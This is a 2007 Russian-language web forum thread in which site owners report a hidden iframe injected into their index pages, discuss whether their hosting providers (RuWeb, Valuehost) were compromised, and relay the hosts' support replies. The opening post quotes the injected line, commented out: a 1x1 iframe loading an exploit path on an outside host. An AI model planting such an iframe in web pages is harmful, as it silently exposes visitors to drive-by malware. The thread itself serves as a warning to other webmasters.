IPB

Здравствуйте, гость ( Вход | Регистрация )

 
Reply to this topicStart new topic
> Инородный код в index (ТРОЯН)
NiSMO
сообщение 18.3.2007, 9:08
Сообщение #1


Advanced Member
Иконка группы

Группа: V.I.P.
Сообщений: 111
Регистрация: 25.1.2005
Из: Russia, Moscow
Пользователь №: 56



Недавно на многих моих сайтах и сайтах моих друзей прописался инородный код (я специально закомментировал):

<!-- <iframe src="http://www.coco32.org/o/exp/" frameborder="0" height="1" width="1"></iframe> -->

По адресу проживает вроде как троян...
Всем советую проверить индексные страницы своих сайтов!

П.С.: Если смотреть код через пункт "Исходный код страницы", например в Firefox, то почему-то этот код не видно... Может у меня глючит что-то. Лучше качнуть индекс страницу и проверить.

Сообщение отредактировал NiSMO - 18.3.2007, 9:11


--------------------
RIP - 400R
Go to the top of the page
 
+Quote Post
Thx Machine Bot
сообщение 29.3.2007, 10:32
Сообщение #2


Говорящий спасибо
***

Группа: Bots
Сообщений: 37
Регистрация: 15.10.2004
Пользователь №: 10



1 пользователей сказало спасибо!
lapochkin


--------------------
Для того чтобы добавить запись, нажмите кнопку user posted image (ниже)
Go to the top of the page
 
+Quote Post
Romeo
сообщение 29.3.2007, 13:20
Сообщение #3


Advanced Member
Иконка группы

Группа: Members
Сообщений: 31
Регистрация: 5.4.2006
Пользователь №: 397



Интересно как он туды мог забраться/???? Это же практически не возможно так поголовно прописать вредоносный код.
Go to the top of the page
 
+Quote Post
NiSMO
сообщение 1.4.2007, 12:05
Сообщение #4


Advanced Member
Иконка группы

Группа: V.I.P.
Сообщений: 111
Регистрация: 25.1.2005
Из: Russia, Moscow
Пользователь №: 56



Возможно хостеров поломали, пустили прогу для прописывания во все индекс файлы *.htm *.php и т.д. вредоносного кода.


--------------------
RIP - 400R
Go to the top of the page
 
+Quote Post
lapochkin
сообщение 4.4.2007, 9:28
Сообщение #5


Advanced Member
Иконка группы

Группа: V.I.P.
Сообщений: 293
Регистрация: 27.2.2006
Из: Орел, Россия
Пользователь №: 360



да, это вполне возможно, а что у вас за хостинг?


--------------------
С уважением, lapochkin!
Go to the top of the page
 
+Quote Post
NiSMO
сообщение 18.5.2007, 6:14
Сообщение #6


Advanced Member
Иконка группы

Группа: V.I.P.
Сообщений: 111
Регистрация: 25.1.2005
Из: Russia, Moscow
Пользователь №: 56



Хостинг RuWeb. Администрация по этому поводу от комментариев отказалась... Сказали что сейчас все нормуль и все тут biggrin.gif


--------------------
RIP - 400R
Go to the top of the page
 
+Quote Post
silik
сообщение 21.5.2007, 14:36
Сообщение #7


Advanced Member
Иконка группы

Группа: Members
Сообщений: 38
Регистрация: 21.2.2006
Из: Moscow
Пользователь №: 352



У меня на Valuehost была такая же проблема, только адрес трояна другой. Пару раз удалял из index.php, но потом надоело и обратился в службу поддержки и был сильно удивлен blink.gif когда хостер прислал мне ответ:
QUOTE
Спасибо за Ваше письмо. Вы можете удалить эти ссылки самостоятельно.  Для профилактических целей можно сменить пароли.
а я им, понимаете, мне напряжно удалять каждые 2 дня со всех своих сайтов ссылки на трояны, проверьте ваши сервера на вирусы, а они мне:
QUOTE
Спасибо за Ваше письмо. Такая проверка не производится.Смените все пароли.
Пароли не менял, но вот уже полгода ничего нету тьфу, тьфу, тьфу.

Сообщение отредактировал silik - 21.5.2007, 14:42


--------------------
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



© 2004-2008 Fireworks Network Forum Текстовая версия Сейчас: 21.6.2018, 11:19